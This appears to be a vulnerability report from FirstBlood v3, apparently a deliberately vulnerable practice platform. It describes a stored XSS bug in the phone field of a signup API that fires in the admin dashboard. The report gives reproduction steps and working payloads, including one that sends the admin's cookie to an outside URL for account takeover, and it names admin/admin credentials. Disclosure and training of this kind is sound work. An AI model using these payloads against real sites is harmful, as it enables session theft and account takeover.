FirstBlood-#1613Stored XSS leading to account takeover in admin user's dashboard via signing up for hackerback
This issue was discovered on FirstBlood v3

On 2022-12-12, ar6aaz Level 3 reported:

Hello Team,

I have come across a Stored XSS vulnerability on FirstBloodv3. The bug exists in the hackerback signup API, and affects the admin user.

Steps to Reproduce:

  1. When a user signs up for Hackerback, it shows up in the admin user's dashboard as "XYZ has joined the event". This notification has two parameters, name & phone.
  2. Go to /hackerback.html and click on sign up. Enter details on the form and intercept the request in Burp.
  3. In Burp, change the value of "phone" parameter to "><svg+onload%3dalert(document.cookie)> and send the request.


  1. Login to the application using the credentials: admin/admin

The Stored XSS will execute and show the admin's cookie in popup.

Impact: Since the admin's cookie isn't HTTPOnly, and can be accessed by Javascript, it can be used to simply extract the admin's cookie and takeover admin's account using a payload like "><img+src%3dx+onerror%3dthis.src%3d'http%3a//'%2bdocument.cookie%3b>

Example of cookie extracted below:


Endpoint: /api/hackerback.php

Parameter: phone

Payload: "><svg onload=alert(document.cookie)>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.